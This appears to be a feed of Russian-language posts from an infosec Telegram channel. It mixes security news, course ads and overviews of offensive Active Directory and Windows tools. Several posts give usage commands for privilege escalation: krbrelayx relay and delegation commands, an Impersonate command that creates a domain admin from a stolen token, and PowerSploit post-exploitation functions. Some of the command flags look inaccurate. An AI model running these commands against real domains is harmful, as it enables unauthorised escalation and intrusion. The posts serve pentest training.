💬 В даркнете выставили «ключи от России»: утечка 3 ТБ данных из SMS-сервисов

👺 Хакеры заявили, что взломали два крупнейших SMS-провайдера России и выложили 3 терабайта данных — в базе якобы находятся имена, номера телефонов, IP-адреса, банковские уведомления, коды активации и даже сообщения от госструктур. Если утечка реальна, это может стать одной из крупнейших компрометаций данных в истории РФ.

🕷️ Последствия потенциально катастрофичны: злоумышленники смогут перехватывать SMS-коды, восстанавливать доступ к аккаунтам, взламывать криптокошельки и рассылать фишинг от имени банков и сервисов прямо с официальных номеров.

Пока ни один из сервисов официально не подтвердил утечку, но риски слишком высоки, чтобы ждать.

❗️Что делать прямо сейчас:
🔴 Откажитесь от SMS-аутентификации — используйте приложения вроде Google Authenticator, Authy, Bitwarden или менеджеры паролей с 2FA.
🔴 Проверьте, где привязан ваш номер (почта, банк, соцсети, биржи) и добавьте альтернативы — e-mail или резервные коды.
🔴 Смените пароли на уникальные и сложные, храните их в менеджере паролей.
🔴 Отключите восстановление по номеру, если есть возможность.
🔴 Не переходите по ссылкам из SMS — даже если сообщение выглядит «официально».

Даже если слухи окажутся преувеличенными — повысить цифровую гигиену никогда не поздно.
Информационная безопасность начинается с осознанных привычек.

Читать полностью…

За кулисами сайтов: как найти то, что не предназначено для чужих глаз 👀

Любой сайт — это лишь видимая часть айсберга. Гораздо интереснее то, что скрыто в его недрах: забытые админ-панели, резервные копии БД, черновики финансовых отчётов

Dirsearch — мощный OSINT-инструмент, который автоматически сканирует сайты, перебирая тысячи путей. Он находит то, что не видно в интерфейсе и не проиндексировано поисковиками.

В статье разбираем:
✴️Как работает Dirsearch и как читать его находки (коды 200, 403, 301 — это не просто цифры)
✴️Полная инструкция: от установки до настройки кастомных словарей и работы с прокси
✴️Легальные сценарии для бизнес-аналитики, конкурентной разведки и оценки безопасности

Освойте все инструменты разведки на нашем курсе, стартуем 20 октября

✔️По всем вопросам пишите @CodebyManagerBot

Читать полностью…

📱 14 октября 2025 года — историческая дата для цифрового мира. В этот день компания Microsoft официально прекратила поддержку всех редакций Windows 10, подведя черту под жизненным циклом одной из самых популярных и массовых операционных систем, которая верой и правдой служила пользователям целое десятилетие.

⤵️Что на практике означает «конец поддержки»?
С сегодняшнего дня для Windows 10 больше не будут выпускаться:
- Обновления для системы безопасности, защищающие от новых угроз
- Обновления компонентов, добавляющие новые функции
- Техническая помощь от Microsoft

Однако существует важный нюанс — программа ESU (Extended Security Updates). Это платная услуга от Microsoft, которая позволяет получать критические обновления безопасности вплоть до 2028 года.

📍Путь «десятки»
Windows 10 была представлена 29 июля 2015 года и изначально позиционировалась как «последняя версия Windows». Microsoft стремилась создать единую платформу для ПК, планшетов и смартфонов, перейдя на модель постоянного обновления «Windows как сервис».

По данным StatCounter, Windows 10 стала настоящим феноменом:
▪️Самая популярная Windows в истории, обогнавшая легендарную Windows XP
▪️Пик популярности пришелся на декабрь 2021 года, когда ее доля на рынке Windows достигла рекордных 82%
▪️Даже после выхода Windows 11, «десятка» до последнего дня оставалась второй по распространенности системой, занимая около 40% рынка

Секрет ее долголетия — в удачном балансе: она сочетала в себе стабильность и черты любимой

Windows 7

с требованиями современности.

📍С уходом Windows 10 у пользователей есть два основных пути:
▪️Переход на Windows 11
Новая ОС от Microsoft встречает неоднозначную реакцию. К главным претензиям относятся:
- Жесткие системные требования (TPM 2.0, Secure Boot)
- Периодическая нестабильность и баги
- Спорные изменения интерфейса (например, меню «Пуск»)

Несмотря на критику,

Microsoft

продолжает дорабатывать систему, и рано или поздно переход на нее станет неизбежным.

▪️Рассмотреть Linux
С уходом Windows 10 давние дебаты между сторонниками Windows и Linux стали еще актуальнее. Выбор зависит от задач: для большинства домашних и офисных нужд Windows 11 остается основным путем, но Linux представляет собой мощную альтернативу для тех, кто ценит гибкость и открытость.

Читать полностью…

В 2000 году интернет был полон оптимизма и дотком-бума. Казалось, что цифровое золотое дно неисчерпаемо. Но этой эйфории был нужен лишь один мощный удар, чтобы обнажить хрупкость новой экономики.

Этим ударом стала серия беспрецедентных кибератак, а их автором — 15-летний канадец, известный под ником Mafiaboy.

Это история о том, как один подросток своими действиями заставил мир задуматься о безопасности в Сети.

🟧Интернет без защиты
На заре своего развития интернет создавался как открытая система для обмена информацией. Вопросы безопасности стояли на последнем месте. Приватность и защита данных были абстрактными понятиями, а низкая распространенность компьютеров создавала иллюзию безопасности. Даже когда интернет стал коммерческой средой, его инфраструктура оставалась уязвимой. Системы были открыты для всех, включая тех, кто решил проверить их на прочность.

🟧Неделя, которая потрясла сеть
Все началось 7 февраля 2000 года. Крупнейший на тот момент портал и поисковик Yahoo! оказался недоступен примерно на час. Это был не сбой, а хорошо спланированный удар. В последующие дни волна атак обрушилась на других гигантов:
🟧Amazon
🟧eBay
🟧CNN
🟧Dell

В течение восьми дней эти сайты, столпы новой экономики, тонули под лавиной ложных запросов. Мир впервые столкнулся с масштабной

DDoS-атакой (Distributed Denial-of-Service)

.

Принцип был прост: перегрузить серверы таким количеством запросов, чтобы они перестали отвечать легитимным пользователям. Эффект был оглушительным.

🟧Кто стоит за атакой?
Уже к середине февраля имя Mafiaboy не сходило с первых полос газет. Кульминацией общественной паники стал саммит по кибербезопасности в Белом доме, созванный президентом США Биллом Клинтоном.
За ником Mafiaboy скрывался 15-летний Майкл Калс. Расследование показало, что он не был гениальным программистом. Свою атаку на Yahoo! Майкл назвал проектом Риволта (Rivolta), что в переводе с итальянского означает «восстание» или «бунт». Такие эксперты, как известный хакер Кевин Поулсен, называли его «скрипт-кидди» — подростком, использовавшим готовые хакерские инструменты, созданные другими.

Его мотивация была простой - хвастовство. Он активно обсуждал свои «подвиги» в

IRC-чатах

, что в итоге и стало главной уликой для

ФБР

и канадской полиции (

RCMP

).

🟧Суд и приговор
12 сентября 2001 года суд Квебека вынес приговор. Учитывая масштаб ущерба, который оценивали в миллиарды долларов (хотя эти цифры многими оспаривались), приговор оказался таким:
🟧Восемь месяцев открытого содержания под стражей (не в тюрьме)
🟧Годичный испытательный срок
🟧Ограничения на использование интернета
🟧Штраф в размере 250 долларов

🟧

Сегодня

Майкл Калс

— успешный эксперт в области кибербезопасности и генеральный директор компании

DecentraWeb

.

Читать полностью…

PowerSploit — Модульный PowerShell-фреймворк для пост-эксплуатации

PowerSploit — это коллекция PowerShell-модулей и скриптов, предназначенных для помощи пентестерам и red-team специалистам на этапах пост-эксплуатации: выполнение кода, повышение привилегий, обход защиты, сбор информации и вывод данных. Проект содержит набор готовых функций для инъекции кода, извлечения учётных данных, поиска в системе уязвимостей конфигурации и других задач, характерных для работы после получения начального доступа.

⚡️ Основные возможности PowerSploit
⏺️ Code execution / инъекция и загрузка шелл-кодa — функции вроде Invoke-Shellcode и Invoke-ReflectivePELoad позволяют запускать произвольный код в контексте процесса Windows.
⏺️ PrivEsc (повышение привилегий) — модуль PowerUp и другие скрипты собирают и проверяют распространённые векторы повышения привилегий в Windows-окружении.
⏺️ Credential access / извлечение учётных данных — инструменты и обёртки для вызова Mimikatz и других техник получения паролей/хэшей.
⏺️ Persistence, Evasion, Recon & Exfiltration — скрипты для устойчивого присутствия, обхода AV/EDR (включая техники «fileless»), сбора информации о системе и экспорта данных.
⏺️ Модульная структура и экспорт — удобный набор отдельных модулей (CodeExecution, Privesc, Exfiltration и др.) для выборочной загрузки и использования в сценариях.

⬇️ Установка и быстрый запуск
PowerSploit может использоваться как локально (импорт модулей в интерактивный PowerShell), так и развертываться через PowerShell Gallery/загрузку с GitHub.

Пример скачивания и импорта модуля:

git clone https://github.com/PowerShellMafia/PowerSploit.git
cd PowerSploit
# импорт конкретного скрипта, например PowerUp
Import-Module .\Privesc\PowerUp.ps1
# или выполнить функцию прямо из файла
.\Privesc\PowerUp.ps1
Invoke-AllChecks

Также имеется пакетная публикация/манифест для PowerShell Gallery (версия PowerSploit 3.0.0.0), что упрощает установку через PowerShellGet. При использовании в реальных тестах предупреждаем: многие EDR/AV детектируют активности PowerSploit, поэтому запускать инструменты следует только в тестовых средах.

⚙️ Преимущества PowerSploit
➡️ Широкий набор готовых техник — экономит время в post-exploit фазе, объединяя распространённые приёмы в одном наборе.
➡️ Модульность и читаемость — скрипты на PowerShell легко адаптировать под конкретные сценарии и изучать для обнаружения и защиты.
➡️ Активное признание в сообществе — PowerSploit фигурирует в учебных материалах, чек-листах по атаке/защите и в базах знани (MITRE/S0194).

Читать полностью…

BloodHound — Визуализация и анализ путей эскалации в Active Directory

BloodHound Legacy — оригинальная реализация известного проекта BloodHound для картирования связей в Active Directory. Инструмент собирает данные об объектах AD (пользователи, группы, компьютеры, ACL, делегирование и т.д.), загружает их в графовую базу Neo4j и отображает в удобном графическом интерфейсе, позволяющем быстро находить пути эскалации.

Основные возможности BloodHound Legacy
⏺️ Сбор данных SharpHound-коллектором: собирает информацию по множеству «сводных» источников — сессии, групповые членства, ACL, делегирование, SPN и др. (данные затем загружаются в Neo4j).
⏺️ Визуализация графа привилегий: поиск кратчайших путей до Domain Admin, фильтры и преднастроенные запросы на примечательные сценарии эскалации.
⏺️ Набор готовых запросов/паттернов (которые удобнее исполнять в GUI) для быстрого обнаружения опасных конфигураций — например, неочевидных прав доступа или делегирования.
⏺️ Экспорт/импорт собранных данных (JSON/ZIP) — удобно включать в отчёты и последующий анализ.
⏺️ Подходит для оффлайн-анализа: можно загрузить заранее собранные данные и работать с ними локально в GUI.

⬇️ Установка и запуск (общая инструкция, Legacy)
1️⃣ Скачайте BloodHound CLI — это утилита, которая автоматически развернёт весь стек в Docker Compose. Выберите релиз под вашу ОС/архитектуру и скачайте (в примере — Linux AMD64):

wget https://github.com/SpecterOps/bloodhound-cli/releases/latest/download/bloodhound-cli-linux-amd64.tar.gz

(для macOS / Windows используйте соответствующие бинарники).

2️⃣ Распакуйте скачанный архив:

tar -xvzf bloodhound-cli-linux-amd64.tar.gz

После распаковки у вас появится исполняемый bloodhound-cli.

3️⃣ Запустите установку (в той же папке, где лежит bloodhound-cli):

./bloodhound-cli install

Инсталлятор загрузит docker-compose.yml, создаст тома и контейнеры (Postgres, Neo4j/graph-db, application, web UI) и запустит их. В процессе в терминале будет выведен сгенерированный пароль администратора.

❓ Преимущества BloodHound Legacy
➡️ Даёт наглядное представление о сложных взаимосвязях в AD — графы делают очевидными скрытые пути эскалации.
➡️ Широко известен и принят в сообществе — много готовых гайдов, курсов и правил детекции.
➡️ Гибкость в анализе: можно загружать кастомные данные и писать собственные запросы для поиска необычных сценариев.

В настоящее время BloodHound стал классикой для пентестеров и специалистов по безопасности. Было бы круто услышать ваши отзывы и кейсы — пишите в комментариях свои истории использования, лайфхаки или нестандартные находки!

Читать полностью…

А вы знали что...
🔸85% мобильных приложений содержат критические уязвимости (отчет OWASP 2024)
🔸Каждое 3-е приложение в Google Play имеет уязвимости, связанные с хранением данных (исследование Positive Technologies).
🔸Хакерские атаки на Android выросли на 50% за последние 2 года (данные Kaspersky Lab).

Знание этих рисков – первый шаг к безопасности. Второй – освоить инструменты, которые помогут их устранить. Стартуем 20 октября! 👩‍💻

🔴Записаться

Рассмотрим устройство приложений под ОС Android, этапы создания мобильного приложения, приемы реверса и изменения кода. Подробно изучим поиск и эксплуатацию уязвимостей.

Курс создан для:
🌟 Сотрудников подразделений ИБ для повышения квалификации, новичков в сфере анализа мобильных приложений, реверс-инженеров для повышения квалификации в области мобильных приложений

🚀 По всем вопросам пишите @CodebyManagerBot

Читать полностью…

Разбор уязвимостей на доске!
Твоя задача — вычислить CVSS, как настоящий аналитик.
Пиши свой расчёт и аргументы в комментариях — будем считать вместе 🧮

Читать полностью…

📚 Работа и учёба отлично совмещаются на оплачиваемой стажировке GPB.Level Up: Кибербезопасность! Здесь гибкий график от 30 часов в неделю и удобные форматы: очно или гибридно в зависимости от направления.

GPB.Level Up: Кибербезопасность — стажировка в области информационной безопасности в Газпромбанке для старшекурсников, выпускников и начинающих специалистов. Вот и другие преимущества:
— зарплата 80 000 рублей со старта (gross при работе 40 часов в неделю)
— поддержка от опытных наставников и экспертов информационной безопасности
— доступ к 800+ курсам для развития soft и hard skills, Skillbox, Lerna и другим платформам
— перспективы для карьеры: более 90% участников GPB.Level Up: Кибербезопасность прошлого сезона остались работать в банке

Время показать свои таланты, жми на кнопку!
https://vk.cc/cQ15t4?erid=2W5zFJ4r7Ct

Читать полностью…

krbrelayx — Набор инструментов для атак на Kerberos и NTLM в Active Directory

krbrelayx — это мощный набор Python-утилит для тестирования безопасности инфраструктуры Active Directory, в частности Kerberos и NTLM-аутентификации. Инструмент позволяет исследовать и эксплуатировать уязвимости, связанные с relay-атаками (Kerberos relay, LDAP relay).

🪛 Основные возможности krbrelayx
➡️ Kerberos Relay Attacks — реализация атак по принципу NTLM relay, но с использованием Kerberos (через S4U2Proxy/S4U2Self).
➡️ LDAP и LDAPS Relay — получение привилегий и добавление аккаунтов через перехваченные тикеты.
➡️ Resource-based Constrained Delegation (RBCD) exploitation — автоматизация добавления себя в делегирование и эскалация прав до Domain Admin.
➡️ Поддержка различных сервисов: LDAP, SMB, HTTP, MSSQL и др.
➡️ Интеграция с другими инструментами: можно использовать вместе с impacket, ntlmrelayx, getST.py и adidnsdump.
➡️ Тонкая настройка сценариев: выбор цели, фильтров LDAP, а также логирование и отладка запросов Kerberos.


⬇️ Установка и запуск
Клонируйте репозиторий:

git clone https://github.com/dirkjanm/krbrelayx.git
cd krbrelayx
pip install -r requirements.txt

Для запуска, например, LDAP-релея:

python3 krbrelayx.py --target ldap://dc01.corp.local --escalate-user attacker

Можно использовать с различными параметрами для указания SPN, делегирования и типов тикетов (TGS, TGT).

Пример для атаки через Kerberos:

python3 krbrelayx.py -t ldap://dc.corp.local --delegate-from victim$ --delegate-to target$ --add-computer attacker$

⚙️ Преимущества krbrelayx
⏺️ Позволяет исследовать реальные Kerberos relay-уязвимости без необходимости ручного построения пакетов.
⏺️ Поддерживает комплексные сценарии атак на делегирование (RBCD, unconstrained и constrained).
⏺️ Совместим с современными версиями Windows Server и Active Directory.

Читать полностью…

Киберпреступления оставляют цифровые следы. Научитесь их находить.

Цифровой криминалист — это тот, кто расследует атаки, восстанавливает данные и делает виртуальный мир безопаснее.

Освойте цифровую криминалистику и реагирование на инциденты в Linux-среде. Старт курса 13 октября!

⌨️ Регистрация здесь

Что вас ждёт на курсе:
🟧 Реальные кейсы, основанные на APT-отчетах
🟧 Полный цикл реагирования на инциденты с помощью opensource-инструментов
🟧 Поиск и анализ артефактов хакеров и вредоносного ПО

Кому подходит курс:
🟧 Аналитикам 1, 2, 3 линии SOC
🟧 Начинающим специалистам в DFIR и Red Team
🟧 Организациям, желающим прокачать команду по реагированию на киберинциденты и Linux-форензику

Хотите научиться расследовать кибератаки и распутывать цифровые следы?
Присоединяйтесь — узнайте всё о форензике. Начать учиться сейчас

🚀 @CodebyManagerBot

Читать полностью…

📱 Банковский Android-троян атакует пожилых людей!

👨‍🦳 Новый Android-троян «Datzbro» обманывает пожилых людей, используя сгенерированные искусственным интеллектом события путешествий в Facebook. Исследователи выявили ранее не выявленный банковский троян для Android под названием Datzbro , который может осуществлять атаки по захвату устройств ( DTO ) и совершать мошеннические транзакции, наживаясь на пожилых людях.

🌐 Компания ThreatFabric заявила, что обнаружила эту вредоносную активность в августе 2025 года после того, как пользователи в Австралии сообщили о мошенниках, управляющих группами в Facebook, рекламирующими «активные поездки для пожилых людей». Среди других территорий, на которые нацелились злоумышленники, — Сингапур, Малайзия, Канада, ЮАР и Великобритания.

📱 Действовали злоумышленники следующим образом: создавали тематические сообщества в Facebook, в которых генерировался контент с помощью ИИ, далее пожилые люди, которые ищут возможности для общения и путешествия, обращались к ним за услугами. После чего с ними связываются через Facebook или WhatsApp, где их просят загрузить APK-файл по вредоносной ссылке (например, «download.seniorgroupapps[.]com»), утверждая, что это позволит им зарегистрироваться на мероприятии, общаться с участниками и отслеживать запланированные мероприятия.

📵 Ниже приведен список вредоносных приложений Android, которые были обнаружены в процессе распространения Datzbro:

Senior Group (twzlibwr.rlrkvsdw.bcfwgozi)
Живые годы (orgLivelyYears.browses646)
ActiveSenior (com.forest481.security)
DanceWave (inedpnok.kfxuvnie.mggfqzhl)
作业帮 (io.mobile.Itool）
麻豆传媒 (fsxhibqhbh.hlyzqkd.aois
麻豆传媒 (mobi.audio.aassistant)
谷歌浏览器 (tvmhnrvsp.zltixkpp.mdok)
MT管理器 (varuhphk.vadneozj.tltldo)
MT管理器 (spvojpr.bkkhxobj.twfwf)
大麦 (mnamrdrefa.edldylo.zish)
MT管理器 (io.red.studio.tracker)

⚠️ На данный момент подобные атаки еще на зафиксированы на территории России, но, по возможности, лучше предостеречь своих близких!

Читать полностью…

➡️ Что такое STIX и TAXII?

❓ Данные термины в киберразведке используются часто вместе, но что это такое и зачем они нужны?

🔺 STIX (Structured Threat Information eXpression) — это стандартный язык для структурированного описания и обмена информацией о киберугрозах. Он предоставляет общую структуру для представления данных об индикаторах компрометации, тактиках, техниках и процедурах угроз, а также участников угроз. Это позволяет организациям более эффективно обмениваться и анализировать разведывательную информацию для улучшения защиты и реагирования на инциденты

🔺 TAXII (Trusted Automated eXchange of Intelligence Information) — это протокол и набор сервисов, который обеспечивает стандартизованный и автоматизированный обмен информацией, представленной в формате STIX, между организациями. TAXII использует HTTPS и RESTful API для передачи данных, обеспечивает обнаружение, управление коллекциями данных и поддерживает различные модели обмена. Это позволяет организациям надежно и эффективно обмениваться актуальной информацией об угрозах в автоматическом режиме.

👀 Получается, что STIX отвечает за структуру и формат описания угроз, а TAXII - за способ передачи информации об угрозах. Именно поэтому они используются совместно для улучшения обмена информации об угрозах. Но как это все выглядит на практике?

Пример STIX:

{
  "type": "bundle",
  "id": "bundle--12345678-1234-1234-1234-123456789abc",
  "objects": [
    {
      "type": "indicator",
      "id": "indicator--abcd1234-5678-90ef-ghij-klmnopqrstuv",
      "created": "2025-09-30T12:00:00Z",
      "modified": "2025-09-30T12:00:00Z",
      "name": "Malicious IP Address",
      "description": "Known IP address associated with malware command and control",
      "pattern": "[ipv4-addr:value = '192.0.2.1']",
      "pattern_type": "stix",
      "valid_from": "2025-09-01T00:00:00Z"
    }
  ]
}

Этот пример описывает "индикатор" — IP-адрес 192.0.2.1, который ассоциируется с вредоносной активностью. В STIX используются объекты с типами, например "indicator", а также указывается паттерн (pattern) для обозначения конкретного признака угрозы.

Читать полностью…

RDWAtool: Аудит и анализ контроллеров домена Active Directory

RDWAtool (Remote Directory Writable Attributes Tool) — утилита, разработанная французским исследователем безопасности p0dalirius. Задача — автоматизировать процесс аудита прав доступа к атрибутам объектов в Active Directory.

Инструмент подключается к контроллеру домена и проверяет, к каким атрибутам (номеру телефона, описанию должности, почтовому адресу) пользователь или компьютер имеют права на запись. Это позволяет быстро ответить на вопросы:
🟧Какие данные в домене я могу изменить?
🟧Не являются ли эти права избыточными и не создают ли они угрозу для безопасности?
🟧Какие атрибуты могут быть использованы злоумышленником для эскалации привилегий или перемещения по сети?

🟧Клонируем репозиторий

git clone https://github.com/p0dalirius/RDWAtool.git

🟧Переходим в директорию с инструментом

cd RDWAtool

🟧Устанавливаем необходимые Python-библиотеки

pip3 install -r requirements.txt

🟧Проверяем

RDWAtool -h

🟧Минимальная команда для запуска требует указания учетных данных пользователя домена и целевого контроллера домена (DC)

python3 rdwatool.py -u 'DOMAIN\Username' -p 'Password' -d 'dc.domain.local'

Где:
-u / --username - имя пользователя в формате DOMAIN\Username
-p / --password - пароль пользователя
-d / --domain - DNS-имя или IP-адрес контроллера домена.

После выполнения команды

RDWAtool

начнет сканирование, выводя в реальном времени список объектов

AD

и записываемых для них атрибутов.

🟧Сканировать только пользователей

python3 rdwatool.py -u 'DOMAIN\User' -p 'Pass' -d 'dc.domain.local' --users

🟧Сканировать только компьютеры

python3 rdwatool.py -u 'DOMAIN\User' -p 'Pass' -d 'dc.domain.local' --computers

🟧RDWAtool применяется в различных сценариях
🟧Red Team - выявляет векторы для эскалации привилегий через записываемые атрибуты для атак (Key Credential Attack, Golden Tickets).
🟧Blue Team - обнаруживает избыточные права в AD для соблюдения Principle of Least Privilege и устранения векторов атак.
🟧Администраторы - анализирует права на запись атрибутов для расследования инцидентов и планирования изменений.

Читать полностью…

📱 Компания Discord опубликовала заявление с подробным разъяснением инцидента безопасности, который произошел с одним из ее сторонних поставщиков услуг по обслуживанию клиентов. В отличие от взлома систем самого Discord, инцидент стал результатом целенаправленной атаки на сотрудника третьей стороны.

🔺Хронология инцидента
Инцидент берет начало не с технического взлома, а с многоэтапной атаки методом социальной инженерии. Злоумышленники, используя методы манипуляции, смогли обманом получить доступ к учетной записи одного из сотрудников сторонней службы поддержки. Это произошло до 5 мая 2023 года, когда команде безопасности Discord официально стало известно о произошедшем.

После компрометации учетной записи злоумышленник получил доступ к тем данным, которые обрабатываются в тикетах службы поддержки. Это означает, что был раскрыт ограниченный объем информации, включающий адреса электронной почты пользователей, обращавшихся в поддержку, содержание их сообщений к операторам, а также любые документы, прикрепленные к этим обращениям.

🔺Важно подчеркнуть, что внутренние системы Discord и основные данные аккаунтов не были затронуты. Расследование не выявило никаких признаков того, что злоумышленник получил доступ к паролям, платежной информации или к личным сообщениям, которыми пользователи обмениваются в дружеских беседах и на серверах.

🔺Реакция и предпринятые меры
Узнав об инциденте, Discord немедленно приступил к серии действий по устранению угрозы и минимизации последствий.
🟣Первым действием стала полная блокировка скомпрометированной учетной записи сотрудника сторонней службы поддержки для предотвращения дальнейшего несанкционированного доступа.
🟣В срочном порядке обслуживание клиентов было переведено на нового поставщика услуг для обеспечения непрерывности работы.
🟣Была запущена целевая рассылка всем пользователям, чьи данные могли быть затронуты инцидентом. Каждому такому пользователю было направлено персональное сообщение с описанием ситуации и рекомендацией проявлять повышенную бдительность к фишинговым письмам, которые могут прийти на адрес электронной почты, указанный в обращении в поддержку.
🟣Компания инициировала работу по усилению систем безопасности и пересмотру процессов взаимодействия с третьими сторонами для предотвращения подобных инцидентов в будущем.

В своем заявлении компания принесла извинения за произошедшее и заверила, что продолжает укреплять как собственные системы безопасности, так и требования к сторонним партнерам, чтобы не допустить подобных инцидентов в будущем.

💬А что думаете вы о данном инциденте?

Читать полностью…

🚕 Пранкер устроил DDoS атаку на улицах Сан-Франциско, заказав 50 беспилотных такси

В Сан-Франциско группа людей одновременно забронировали 50 автомобилей с беспилотным управлением компании Waymo, в результате чего около 50 беспилотников оказались выстроены в «пробку» и временно заблокировали движение

— инцидент, который автор акции назвал «перво­й в мире DDoS-атакой на Waymo». Данный план был опубликован в аккаунте X 12 октября пользователем Райли Уолзом (Riley Walz).

💬 По словам организатора, несколько десятков человек одновременно заказали автомобили и направили их в длинный тупик в центре города — машины Jaguar I-Pace, используемые Waymo, выстроились в очередь и временно не могли продолжить движение. Уолз назвал это «DDoS-атакой», имея в виду массовые одновременные запросы, которые кратковременно перегрузили локальную сеть сервиса.

👀 Waymo оперативно отреагировала — по словам Уолза, такси «уехали примерно через 10 минут», а пользователям выписали по $5 штрафа за неявку. Компания позже заявила, что совершенствует системы, чтобы предотвращать подобные сценарии в будущем. Организатор также отметил, что акция была продумана так, чтобы не помешать другим людям, и что мероприятие можно рассматривать как проверку устойчивости сервиса.

🤓 Райли Уолз ранее уже привлекал внимание своими техническими экспериментами: в сентябре он запускал сервис, который собирал общедоступные данные о штрафах за парковку в Сан-Франциско и выводил их в удобной форме; город быстро отреагировал и закрыл доступ к данным. Организатор подчеркивает, что подобные акции выявляют слабые места систем и стимулируют компании улучшать защиту и устойчивость.

Юридические и этические вопросы остаются открытыми: массовые координированные бронь-кампании могут создавать реальную опасность для дорожного движения и мешать работе служб, даже если их организаторы преследуют «экспериментальные» цели. А что вы думаете по этом поводу?

Читать полностью…

🔺Impersonate - инструмент, позволяющий манипулировать токенами в ОС Windows и скомпрометировать учётные записи, в том числе администраторов домена, без прямого взаимодействия с процессом LSASS.

💻 Установить инструмент можно, загрузив файлы из репозитория и с помощью дальнейшей компиляции.

В Windows существуют два типа токенов доступа, которые зависят от способа входа в систему:
🔺Первичный токен создаётся при интерактивном входе (например, через WinLogon или RDP) и связывается с процессом пользователя. Учётные данные при этом сохраняются в памяти процесса LSASS, что позволяет использовать механизм единого входа.

🔺Токен олицетворения создаётся при неинтерактивном (удалённом) входе, например, при подключении к SMB. Он связан с потоком и позволяет работать с привилегиями выделенного пользователя, а не от имени SYSTEM.

🔺Использование
Поддерживается возможность работы как в графическом интерфейсе (например, RDP), так и удалённо (через WMIExec, PsExec, WinRM).

Состоит из следующих модулей:
1️⃣list — позволяет просматривать список токенов, находящихся в системе

Impersonate.exe list

2️⃣adduser — модуль позволяет повысить привилегии в домене Active Directory с помощью функции ImpersonateLoggedOnUser. Для работы этого модуля потребуется права NT AUTHORITY\System и первичный токен, связанный с учетной записью администратора домена в системе. Модуль создаст нового пользователя в домене, установит для него пароль и добавит его в группу администраторов домена.

Impersonate.exe adduser <token id> <username> <password> <domain admin group> <remote DC server>

3️⃣exec — позволяет запускать пользовательские команды на сервере.

Impersonate.exe exec <token id> <cmd>

Читать полностью…

adidnsdump — Утилита для сбора и анализа DNS-записей Active Directory

adidnsdump — это лёгкий инструмент для извлечения и экспорта DNS-записей, хранящихся в Active Directory (AD). Проект помогает быстро собрать картину DNS-записей домена, понять распределение хостов и сервисов, найти устаревшие/подозрительные записи и подготовить материалы для дальнейшей разведки или эксплуатации.

Основные возможности adidnsdump
➡️ Сбор DNS-записей из Active Directory через AD-интерфейсы (LDAP/AD-specific queries).
➡️ Экспорт результатов в удобные форматы (JSON / CSV) для дальнейшего анализа и интеграции в другие инструменты.
➡️ Фильтрация и выборка по зонам, типам записей (A, CNAME, SRV и др.) и времени обновления — помогает выявлять устаревшие или неизвестные хосты.
➡️ Упрощённая автоматизация — можно включать в пайплайны разведки и отчётности.
➡️ Лёгкая интеграция с другими инструментами для последующих шагов (сканирование найденных хостов, атаки на сервисы и т.д.).

⬇️ Установка и запуск
Клонируйте репозиторий и установите зависимости:

git clone https://github.com/dirkjanm/adidnsdump.git
cd adidnsdump
pip install .

Пример простого запуска

python3 adidnsdump.py <domain-controller> --output dns_dump.json

В зависимости от окружения можно указывать параметры аутентификации или использовать Kerberos/SSPI (см. справку скрипта для доступных флагов):

python3 adidnsdump.py -h

⭐ Преимущества adidnsdump
➖ Быстрый и структурированный экспорт DNS-информации из AD — экономит время на reconnaissance.
➖ Помогает обнаруживать “тихие” цели: старые записи, CNAME с внутренними сервисами, SRV-записи с важными ролями.
➖ Удобный формат вывода (JSON/CSV) делает результаты пригодными для автоматической обработки и отчётности.
➖ Малый вес и простота запуска — не требует сложной настройки, легко включается в сценарии пентеста.

Читать полностью…

Как защитить IT-инфраструктуру компании от хакеров и утечек? 🔐

Под руководством опытных кураторов вы разберётесь в ключевых процессах мониторинга безопасности и научитесь внедрять их на практике

🔴Подробнее

Что ждёт на курсе?
✨ Threat Intelligence & Hunting — ищем угрозы
✨ Vulnerability & Patch Management — закрываем дыры быстрее хакеров
✨ Incident Response (IR) — отрабатываем атаки по шагам
✨ Администрирование СЗИ — настраиваем защиту как профи

Что получите в итоге?
🔸Готовые схемы защиты под разные бизнес-сценарии
🔸 Навыки, которые ценят в SOC, CERT и отделах безопасности
🔸Сертификат

Кому подойдёт?
✅ Начинающим специалистам по инфобезопасности
✅ Сисадминам, которые хотят перейти в ИБ
✅ IT-специалистам, уставшим от "латания дыр" без системы

🔴 Успейте записаться до 20 октября

🚀 По всем вопросам пишите @CodebyManagerBot

Читать полностью…

🛡 Введение в информационную безопасность - теперь на HackerLab!

Информационная безопасность - не одна профессия, а целая экосистема. Одни ищут уязвимости и тестируют системы на прочность, другие расследуют инциденты, третьи строят инфраструктуру, где риски сбоев и утечек сведены к минимуму.

Чтобы осознанно выбрать своё направление, нужно понимать,
как всё это устроено изнутри - от атак и уязвимостей до принципов защиты.

⚠️ Именно с этого начинается курс «Введение в информационную безопасность», который включён в новую подписку PRO для самостоятельного изучения.

Ты научишься:
🔵Находить и эксплуатировать уязвимости
🔵Решать CTF-задания
🔵Организовывать защиту от перебора паролей и настраивать систему обнаружения вторжений
🔵Работать с консолью Windows и Linux и писать скрипты для автоматизации задач
🔵Пользоваться ключевыми инструментами пентестера

✅ Теперь в подписке PRO:
- Курс «Введение в информационную безопасность»
- Курс «SQL Injection Master»
- Полный доступ к архивным заданиям
- Доступ к WriteUps для архивных заданий
- Изолированная инфраструктура

➡️ Прокачивайся уже сейчас: https://hackerlab.pro/subscription

Читать полностью…

Продолжаем мотивировать вас на обучение! 🧑‍💻

Академия Кодебай поделилась уроками для CyberCamp2025 на темы:

😎 Реагирование на компьютерные инциденты
Рассмотрим 4 этапа реагирования: подготовка, обнаружение, анализ и сдерживание. В рамках каждого этапа представлено описание процессов, технологий и возможных артефактов при проведении криминалистического анализа, а также перечень мероприятий, проводимых после инцидента.

😎 Пентест инфраструктуры Active Directory
Изучим основные элементы пентеста: уязвимые конфигурации списков доступа, получение первоначального доступа и сохранение доступа к системе. Вся практическая часть представлена в виде наглядных видео-уроков 👨‍💻

😎 OSINT: технология боевой разведки
Проанализируем виды идентификаторов в открытых источниках: электронная почта, никнейм, профили в социальных сетях, и даже IP-адрес 👻

©️ Регистрация l 😺 Чат

Читать полностью…

Readpe: Мастер-инспектор для PE-файлов под Linux

Readpe — это дизассемблер и анализатор PE-файлов. Его ключевое преимущество — кроссплатформенность. Многие аналогичные инструменты заточены под Windows, а readpe компилируется и работает в средах Linux, что делает его незаменимым в арсенале специалистов, которые предпочитают или вынуждены проводить анализ на Unix-подобных системах.

⚡Чем Readpe отличается от других утилит (например, от стандартного objdump)?
- Инструмент сфокусирован исключительно на формате PE. Он предоставляет информацию обо всех критически важных частях файла: заголовках DOS и PE, секциях, таблице импорта и экспорта, ресурсах, отладочной информации и сертификатах.
